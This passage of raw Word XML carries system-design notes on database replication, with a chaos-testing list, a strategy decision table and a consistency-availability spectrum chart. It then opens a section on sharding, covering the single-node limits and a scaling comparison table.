    <w:p w14:paraId="664CC487" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1545"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Read routing handles lag correctly (redirects to primary if lag exceeds threshold).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C4BCE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A94F2BB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1546"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Random node kills.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F30C20E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1546"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Network delay injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C916FEB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1546"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Disk slowness simulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227F8C99" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1546"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Clock skew.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124197BC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="4CDDAA62">
          <v:rect id="_x0000_i5656" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7966CC14" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19. Summary — Replication Decision Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B011B9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.1 Choosing Replication Strategy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047"/>
        <w:gridCol w:w="5303"/>
      </w:tblGrid>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="4784145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A4ED27" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>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2AD041" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Recommended Approach</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="262CBD2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0D5FCB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>High availability (minimize downtime)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20B0D5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Single-leader + sync standby + automated failover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="5D61BB3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61A94F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Read scaling (10x reads)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A90641" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Single-leader + async read replicas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="761DCB1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56F689" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Zero data loss (RPO=0)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3C8DEE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Synchronous replication (within region)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="61FC7B3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04ECD9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Low write latency + global reads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FF235E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Single-leader + async cross-region replicas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="1B02302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10551C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Low write latency globally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9DE25F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Multi-leader (active-active) with conflict resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="1B478CC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FD1EC1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Maximum fault tolerance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91B7DE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Consensus-based (Raft/Paxos) — 3 or 5 nodes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="7BD6A09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EF7812" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Event-driven architecture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DE079B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Logical replication + CDC (Debezium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73DAE404" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.2 The Complete Mental Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6A6BB5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B2DB25" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>┌─────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088DCC7F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│                    REPLICATION SPECTRUM                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EAE480" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│                                                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484CDD76" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│  ← More Consistent                    More Available →           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D8E556" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│  ← Higher Write Latency               Lower Write Latency →     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E2FC8A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│  ← Less Data Loss Risk                More Data Loss Risk →      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF3458" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│                                                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5587D142" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│  Synchronous ───── Semi-Sync ───── Async ───── Leaderless       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5673C125" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>│  (all replicas     (1 replica     (no wait)    (quorum-based)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C57F0F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│   must ACK)         must ACK)                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A83B65" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│                                                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB361B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│  RPO=0              RPO=0          RPO=lag     RPO depends on W  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50578E4A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│  +100ms latency     +2ms latency   +0ms        +0–50ms          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FA8213" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│  Low availability   Good balance   High avail  High avail        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5D00E6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│                                                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF843E8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│  Examples:          PostgreSQL      PostgreSQL  Cassandra         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B51F8A4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│  Spanner,           sync_standby,   async       DynamoDB         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BC91DB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│  CockroachDB        MySQL semi-sync streaming   Riak             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57345626" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>└─────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD9D69C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790ADA3D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replication is the mechanism by which distributed databases achieve the seemingly contradictory goals of durability, availability, and performance. Every replication configuration is a point on a spectrum trading consistency for availability, latency for durability, and simplicity for flexibility. The art is choosing the right point for your specific requirements — and knowing exactly what you're giving up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EC0232" w14:textId="77777777" w:rsidR="00875520" w:rsidRDefault="00875520" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="29234DDA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sharding in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6E6010" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Sharding Really Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076824AD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Sharding is the practice of horizontally partitioning data across multiple independent database instances (shards), where each shard holds a distinct subset of the total data. Together, all shards form a single logical database, but each shard operates independently — with its own CPU, memory, disk, and network resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4153B2AD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental distinction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FA68AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8E4F73" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Vertical Scaling:  Bigger machine (more RAM, faster CPU, larger disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8AB4C3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                   → Eventually hits hardware limits. Single point of failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D456958" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="3AE719E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Replication:       Same data copied to multiple machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED990F4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                   → Scales READS, but writes still bottleneck at one primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9AB8E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="49B47512" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Sharding:          Different data on different machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFC16BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                   → Scales READS and WRITES. No single node holds all data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240163BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why sharding exists — the single-node ceiling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645C5F5D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C36FD7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>PostgreSQL single node (powerful hardware):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A66B03" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Storage: 10 TB (practical limit for manageability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55643F1C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Writes: 20,000–50,000 TPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D5FA08" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Connections: 500–1000 useful connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E5A4C1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  RAM: 1–2 TB (buffer pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEE3B28" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0A606376" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Your requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED46CD3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Storage: 100 TB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265FB505" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Writes: 500,000 TPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B0368A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Connections: 50,000 concurrent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43292F0A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFE637C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Gap: 10–20x beyond single-node capability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433B3F26" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Solution: 10–20 shards, each handling 1/10–1/20 of the data and load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F269FF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What sharding gives you:</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536"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="3738"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="66F0DD8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D949A2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Dimension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EA9835" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Single Node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DDE03F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10 Shards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="263F190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6F7290" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Storage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8AD514" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>10 TB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1D4724" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>100 TB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="2C92E51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B0F3EB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:lastRenderedPageBreak/>
              <w:t>Write throughput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8A634C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>50K TPS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104E27" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>500K TPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="4D0E9C6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6B82AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Read throughput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808F66" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>100K QPS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09F526" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>1M QPS (with replicas per shard)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="32DC2FE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920C74" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Connection capacity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F4A877" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>1000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EFAD68" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>10,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
